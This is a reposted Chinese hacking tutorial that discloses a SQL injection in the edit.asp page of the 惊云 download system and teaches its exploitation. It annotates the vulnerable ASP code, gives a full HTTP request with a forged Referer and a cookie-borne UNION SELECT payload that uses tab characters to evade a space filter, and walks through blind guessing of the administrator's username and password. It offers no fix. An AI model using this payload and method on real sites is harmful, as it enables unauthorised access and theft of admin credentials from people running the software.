惊云下载系统又一个漏洞------脚本过滤不严

惊云下载系统edit.asp文档存在SQL注入漏洞，后台存在任意文档上传漏洞
惊云下载系统以前有个漏洞好象在user.asp，不知现在修补没有。本人这次和大家讲件edit.asp文档的漏洞，一来发布一个
漏洞，二教教大家如何发现和利用漏洞。我一行一行解释。
<%
user=Request.cookies("JyDownUserName")
'取得用户COOKIE并存入USER变量

if user<>"" then
user=replace(user," "," close")
'给USER变量替换空格
else
response.write("<li>您没有进入本页面的权限,本次操作已被记录!<br><li>假如您是本站会员请先<a href=login.asp target=_top>登陆</a>后进入.")
response.end
end if
'上面判断COOKIE是否为空，空则跳转，等会我们构造COOKIE欺骗，让JyDownUserName这个COOKIE值不为空，至于为多少，等会说。

server_vv=len(Request.ServerVariables("SERVER_NAME"))
server_v1=left(Cstr(Request.ServerVariables("HTTP_REFERER")),server_vv)
server_v2=left(Cstr("http://"&Request.ServerVariables("SERVER_NAME")),server_vv)
if server_v1<>server_v2 and server_v1<>"" and server_v2<>"" then
response.write("<script>alert('错误：禁止从站点外部提交数据!.')</script>")
response.end
end if
'上面判断网页是否是从浏览器点击而进入的，我们同样能够伪造是这个地方为真，再此不再赘述
%>

<!--#include file="mdb_path_user.asp"-->
<!--#include file="char.inc"-->
<!--#include file="config.asp"-->
'上面是头文档包含，没什么用，忽略就行了

<%
pwd=replace(request.form("pwd")," "," close")
set rs=server.CreateObject("ADODB.RecordSet")
rs.open "select * from UserInfo where user='"&user&"'",conn,1,2
'关键的一句注入点，因为user=replace(Request.cookies("JyDownUserName"),," "," close"),很明显没有过滤单引号
if rs.eof then
JyDownMsg="错误:"&user&"用户资料读取错误,请重新登陆!"
'注入条件判断语句，没有他都不能确定是否成功，返回此句代表失败
else
if request("type")="save" then
if pwd="" then
JyDownMsg="错误:要修改资料必需填写原密码!"
else
if pwd<>rs("pwd") then
JyDownMsg="错误:原密码错误!"
'注入条件判断语句，没有他都不能确定是否成功，返回此句代表成功，至于为什么我真得无法用语言表达了，还是自己想吧。这句以下已没有意义了。解释至此
else
qm=htmlencode(request.form("qm"))
if len(qm)>250 then
JyDownMsg="错误:个性签名多于250个字符!"
else
.........

好了，已知道注入的地方，而且知道成功的标志，同时知道表的结构（网上能够找到嘛），便能够利用了。
到底如何利用呢？当然最好是搞定管理员的用户和密码拉。

我用WSE抓包后，整理如下（以我自己的机器做实验)

POST /admin/edit.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
1 Referer: http://localhost/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE2)
Host: localhost
Content-Length: 125
Connection: Keep-Alive
cache-Control: no-cache
2 Cookie:iscookies=0; JyDownUserDj=0; JyDownUserName=aaaaaaaa' union select * from userinfo where id=1 and len(pwd)=1 and '1=1

type=save&pwd=tttttt3333tttt&pwd1=&pwd2=&oicq=33337788&email=fsadf@fsf.com&homepage=&qm=&softurl=&b1=确认修改

上面两处是需要注意的，有序号。其他地方随便添，按照我上面的就行了。

1处是为了逃避上面讲到的防网页不是从点击近来的,把这个值设为网址就行了，没什么好讲的。
2处是最关键的，我上面提到了COOKIE欺骗，这里不但要欺骗更有注入。

JyDownUserName这个值我们把他设为了
aaaaaaaa' union select * from userinfo where id=1 and len(pwd)=1 and '1=1
这个。上面是经过编码的。其中 是TAB键的编码，为了躲过空格过滤。他和空格是等价的，真的谢谢MS工程师研发软件总是为用户着想，生怕功能不强。
程式作者只过滤了空格欠考虑。

把上面的值代入到原程式总就变为了（应该学过代数啊，呵呵）
select * from UserInfo where user='aaaaaaaa' union select * from userinfo where id=1 and len(user)=1 and '1=1'

那个a串没什么意义，就是为了使前面语句为假，没有这个用户就行了，能够是任意特别字符串。后面的Select是重点。
ID=1是猜id为1的用户，其实就是管理员用户。但是有的管理员可能改了，那就不灵了。猜他的长度是不是1。
很显然是1可能性很小，不要紧，猜错了，会返回“错误:....用户资料读取错误,请重新登陆!”中间省了一部分。
我们把语句换成
select * from UserInfo where user='aaaaaaaa' union select * from userinfo where id=1 and len(user)=2 and '1=1'
返回“错误:....用户资料读取错误,请重新登陆!”，看来用户名长度也不是2，再换。

换到5是返回 "错误:原密码错误!"，看来用户名长度就是5了。同样方法猜出密码长度7。

该猜字符。
select * from UserInfo where user='aaaaaaaa' union select * from userinfo where id=1 and asc(mid(user,1,1)=40 and '1=1'
上面的语句大家能看懂吧？用mid函数是截取一个字符，然后转换成ASCII码，再和40比较。返回错误，说明user的第一个字符ASCII值不是40。

猜到97的时候返回"错误:原密码错误!",说明用户名第一个字符是a 。

以此类推，猜出user是admin，pwd是abcdefg.管理员的用户密码猜出来了。

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!